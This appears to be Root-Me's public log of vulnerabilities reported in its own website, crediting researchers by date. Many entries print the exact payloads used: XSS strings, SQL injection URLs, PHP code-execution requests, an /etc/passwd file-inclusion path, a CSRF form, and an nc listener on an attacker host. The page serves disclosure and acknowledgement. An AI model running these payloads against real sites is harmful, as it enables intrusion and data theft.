Discovered Weaknesses

As with any information system, a number of weaknesses have been found on the website.

27/08/2022 Laluka

identified that validating a vulnerability, or bumping a piece of site content to a "higher" status (draft to evaluation, or trash to writing), triggers the sending of an email to the author or the administrator. Some variables (title, content, ...) were not properly escaped and were passed to the eval function before the email was sent, allowing code execution:

send(eval($email));

21/07/2022 Abyss Watcher & SpawnZii

identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

11/07/2022 Abyss Watcher

identified a stored XSS vulnerability exploitable through an iframe hosted on the RM domain:

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identified a stored XSS vulnerability exploitable through an iframe hosted on a malicious domain whose name starts with www.root-me.org:

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

identified a vulnerability allowing a member of the association to elevate their role to administrator simply by using the private interface of SPIP.

01/10/2021 Podalirius

identified a vulnerability allowing unrestricted access to documents attached to solutions.

15/05/2020 Laluka

identified multiple vulnerabilities: 3 reflected XSS, 2 SQLi and 1 RCE:

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

identified an XSS vulnerability in the name of the file imported on http://repository.root-me.org/

04/06/2019 x code

identified an XSS vulnerability. This one required user interaction on the chatbox (a click on the previous page):

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 x code

has identified a vulnerability allowing an unprivileged user to kill the database running on the challenge01 server, which hosts several challenges, by saturating memory in a particular way so as to kill the process of their choice. This made it possible, via a race condition, to start another binary in its place listening on the same port.

16/11/2018 Shrewk

identified a vulnerability allowing the users of the store to be trapped through an iframe pointing to a Spreadshirt domain controlled by the attacker (e.g. spreadshirt.ro); the lang parameter was not filtered correctly.

12/04/2018 DrStache & urandom

identified a stored XSS vulnerability in the OSM map of the CTFATD rooms by injecting the following payload into the user's bio (https://www.root-me.org/?page=preferences&lang=en):

<svg onload=console.log(document.domain)>

12/10/2015 ST4HLKR1EG

has identified an "Insecure Direct Object Reference" vulnerability allowing any private message to be read:

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing access to the file system over SSH and the execution of commands.

03/2015 WtF

has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge, allowing files from other challenges to be read.

15/06/2013 LouTerrailloune

has identified a PHP code injection vulnerability on the "code - decode" page:

Text to decode in base64:

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

found several stored XSS in the user profile management:

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

found an LFI in a challenge:

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

found a reflected XSS in the "encode - decode" page:

Text to decode in base64:

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

found an insecure direct object reference which led to unauthorized access to all PMs:

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

found a stored XSS on the chatbox:

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

found a PHP code injection vulnerability in the "online tools : nmap" page:

Host to scan in -sV mode:

--version-trace -p8888 [IP server attacker]

Service listening on the attacker's server:

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

found a CSRF on the chatbox:

<form id="form" action="http://www.root-me.org/?lang=fr" method="post">
<input type="hidden" name="ON" value="1">
<input type="hidden" name="message" value="0wn3d !">
</form>

15/02/2011 EsSandre

found an LFI:

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

found several stored XSS in the PM system:

<script>[code javascript/vbscript]</script>

02/12/2009 real

found a code injection vulnerability:

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'